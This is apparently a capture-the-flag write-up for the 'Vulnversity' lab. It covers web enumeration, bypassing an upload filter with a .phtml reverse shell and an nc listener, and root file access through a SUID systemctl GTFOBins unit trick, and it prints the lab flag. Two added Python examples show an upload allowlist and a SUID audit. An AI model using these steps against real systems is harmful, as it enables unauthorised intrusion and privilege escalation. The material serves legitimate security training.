Vulnversity

goal: get the contents of /root/root.txt and you might not need root to do that!

FTP: anonymous login not allowed

SMB: can’t find much

Website:

  • dirbuster didn’t work
  • dirsearch

dirsearch:

cd /opt/dirsearch
sudo python3 dirsearch.py -u http://10.10.88.73:3333/ -e html -x 400,401,403

result:

(screenshot of the dirsearch output)

nothing unusual except:

/internal

it’s a file upload form. Can we upload something and execute it?

(screenshot of the upload form response)

a .png is “not allowed”, and the site runs PHP.

Search for a php reverse shell

we found:

pentest monkey’s php-reverse-shell (we used this before)

make a new file with it to upload:

mousepad phpreverse.php

and change the IP to the tun0 address and the port to whatever you want (I used 4444)

then open an nc listener:

nc -nvlp 4444

upload and test?

not allowed. Valid extensions to use and test:

Note: the smart way to test this is to send the upload request to Burp Suite’s Intruder and see which extension doesn’t come back with “Extension not allowed”, since the request carries the filename as a parameter

  1. go to Intruder, highlight “php” in the filename and click “add”
  2. attack type: sniper
  3. go to Payloads and add the candidates:
.php
.php3
.php4
.php5
.php6
.phtml
  4. go to Options
    1. in Grep - Match, clear the list and paste “Extension not allowed”
    2. at the bottom, set Follow redirections: always
  5. In the results, the only one without the “Extension not allowed” match was .phtml
    1. also, the response length is the same for all except this one
    2. we could also look at the status code

mv phpreverse.php3 phpreverse.php4
mv phpreverse.php5 phpreverse.phtml
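The Intruder run above shows why an extension blocklist is the wrong control: the form refuses “.php” but the interpreter also handles “.phtml”. The following is an added example, not code from the writeup or from the Vulnversity box, of the weak check beside a hardened one. The blocklist filter is a hypothetical reconstruction of the behaviour the form shows, and the sample filenames and magic bytes are constructed here; the hardened version uses an extension allowlist, rejects double extensions and odd basenames, and checks that the file contents match the claimed type.

```python
import os
import re

# Constructed sample filenames (not from the original writeup), covering the
# extensions probed with Intruder plus a double-extension variant.
SAMPLE_UPLOADS = [
    "photo.png",
    "phpreverse.php",
    "phpreverse.php3",
    "phpreverse.phtml",
    "shell.php.jpg",
]

# Hypothetical blocklist filter of the kind the upload form appears to use:
# it refuses ".php" but knows nothing about the other PHP extensions.
BLOCKED_EXTENSIONS = {".php"}


def blocklist_allows(filename):
    """Weak check: reject only extensions that appear on a blocklist."""
    ext = os.path.splitext(filename)[1].lower()
    return ext not in BLOCKED_EXTENSIONS


# Hardened check: allowlist of image extensions, a single extension only,
# a restricted basename, and a magic-byte test so content must match the name.
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}
MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
SAFE_BASENAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def allowlist_allows(filename, data=b""):
    """Strict check on name and content. Returns (accepted, reason)."""
    name = os.path.basename(filename)  # ignore any client-supplied path
    base, ext = os.path.splitext(name)
    ext = ext.lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False, "extension not on allowlist"
    if "." in base or not SAFE_BASENAME.match(base):
        return False, "basename rejected"  # catches shell.php.jpg and the like
    if not any(data.startswith(magic) for magic in MAGIC[ext]):
        return False, "content does not match extension"
    return True, "ok"


def compare_filters(names=SAMPLE_UPLOADS):
    """Run both checks over the sample names (no content, so only the
    name-based outcome matters). Returns {name: (blocklist, allowlist)}."""
    return {n: (blocklist_allows(n), allowlist_allows(n)[0]) for n in names}


if __name__ == "__main__":
    for name, (weak, strict) in compare_filters().items():
        print(f"{name:22} blocklist={weak!s:5} allowlist={strict}")
```

Even with the hardened check, the stored file should get a server-generated name and the uploads directory should be served without any script handler, so that a file which slips through is never executed.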

that one worked! navigate to:

http://10.10.88.73:3333/internal/phpreverse.phtml

not found

10.10.88.73:3333/phpreverse.phtml

not found

can we find where it gets saved using Burp?

add the website to scope, turn intercept on, then upload again

Nothing. Let’s check for an upload folder:

website/internal/upload
website/internal/uploads

found it!

http://10.10.88.73:3333/internal/uploads/

run the php reverse shell (make sure the nc listener is up)

we get a shell on the server as www-data

search for SUID binaries:

find / -perm -u=s -type f 2>/dev/null

list:

/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/at
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/squid/pinger
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/bin/su
/bin/ntfs-3g
/bin/mount
/bin/ping6
/bin/umount
/bin/systemctl
/bin/ping
/bin/fusermount
/sbin/mount.cifs

check GTFOBins:

/bin/systemctl

that one’s a match!

how to use it:

#sudo install -m =xs $(which systemctl) .              <- dot is included
#this line above is only needed if not already installed
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
./systemctl link $TF
./systemctl enable --now $TF

cd to where the first command found it:

cd /bin/

and run the commands in order, one by one

this makes a temporary service TF that cats root.txt and saves it to an output file in /tmp
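The whole privilege escalation rests on one fact the SUID listing exposed: /bin/systemctl is setuid, which it never should be. The following is an added example, not code from the writeup or from GTFOBins, of the check a defender would run to catch that: it takes the output of the same `find / -perm -u=s -type f` command (the list from this page, embedded inline), compares it against a baseline of expected SUID binaries, and reports anything unexpected or missing. The baseline here is a constructed assumption (the page’s list minus systemctl); on a real host it would be recorded from a known-good build. A live `scan_suid` walker is included for use on the box itself.

```python
import os
import stat

# The SUID list obtained above with `find / -perm -u=s -type f`, embedded
# here as the scan result to audit.
FIND_OUTPUT = """\
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/at
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/squid/pinger
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/bin/su
/bin/ntfs-3g
/bin/mount
/bin/ping6
/bin/umount
/bin/systemctl
/bin/ping
/bin/fusermount
/sbin/mount.cifs
"""

# Hypothetical baseline: what an operator expects to be setuid on this host.
# Constructed here as the list above without /bin/systemctl.
EXPECTED_SUID = frozenset(FIND_OUTPUT.split()) - {"/bin/systemctl"}


def parse_find_output(text):
    """Turn raw `find` output into a sorted, de-duplicated list of paths."""
    return sorted({line.strip() for line in text.splitlines() if line.strip()})


def scan_suid(root="/"):
    """Live equivalent of the find command: regular files with the setuid bit."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat so symlinks are not followed
            except OSError:
                continue  # unreadable or vanished; skip, as 2>/dev/null did
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return sorted(found)


def audit_suid(found, baseline=EXPECTED_SUID):
    """Compare a SUID list with the baseline. Returns (unexpected, missing):
    unexpected = setuid files not in the baseline (new escalation surface),
    missing    = baseline entries no longer setuid (possible tampering too)."""
    found = set(found)
    return sorted(found - baseline), sorted(baseline - found)


if __name__ == "__main__":
    unexpected, missing = audit_suid(parse_find_output(FIND_OUTPUT))
    for path in unexpected:
        print(f"ALERT unexpected setuid binary: {path}")
    for path in missing:
        print(f"WARN  expected setuid binary not found: {path}")
```

Run from cron or a config-management check, the alert fires on /bin/systemctl the moment the bit is set. A second, cheaper signal for this particular abuse is the `link` step: it leaves a symlink in the systemd unit search path whose target sits in /tmp, which no legitimate unit does, so unit files resolving to world-writable directories are worth flagging as well.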

then cat the output:

cat /tmp/output

we get the flag:

a58ff8579f0a9270368d33a9966c7fd5